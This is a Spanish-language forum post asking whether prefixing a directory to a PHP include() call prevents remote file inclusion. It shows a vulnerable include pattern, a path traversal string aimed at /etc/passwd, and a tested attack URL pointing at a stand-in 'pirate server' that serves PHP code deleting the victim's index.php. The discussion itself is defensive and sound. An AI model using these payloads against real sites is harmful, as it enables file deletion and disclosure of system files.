no me referia a eso, se que por ejemplo no voy a incluir algo del tipo
../../../../../../etc/passwd

Esta claro que eso no lo permitiria el servidor ni nada por el estilo.

El problema es que como surgió en otro post, al incluirlos sin ruta,
include($_GET['pagina'] . ".php");

yo podia hacer index.php?pagina=http://www.servidorpirata.com/script

y en script.php en el servidor pirata poner algo como

<?php
echo '<? unlink("index.php");?>';
?>

y eso funcionaría y borraría el index.php de tu página web, lo he probado y funcionó.

El caso es que discutiendo con un amigo, él dice que en su web no se peude hacer.

Al hacer include("./pages/" . $_GET['pagina'] . ".php");

salta un error si metes algo como
index.php?pagina=http://www.servidorpirata.com/script

porque le ha metido una ruta antes "./pages/";

el caso es que sólo tenía la duda de si con eso también te pueden hacer un remote file inclusion, tal como pasaba en el ejemplo de arriba.

Yo dede luego no sé si se puede, por eso pregunto.

Y en mi caso, siempre confio mejor en un switch, y controlarlo todo, a que se me escape algo.

Alguna pruebita si que hice,pero me lanza error. Además, no le quiero toquetear mucho, que depsués se enfada conmigo xd ;)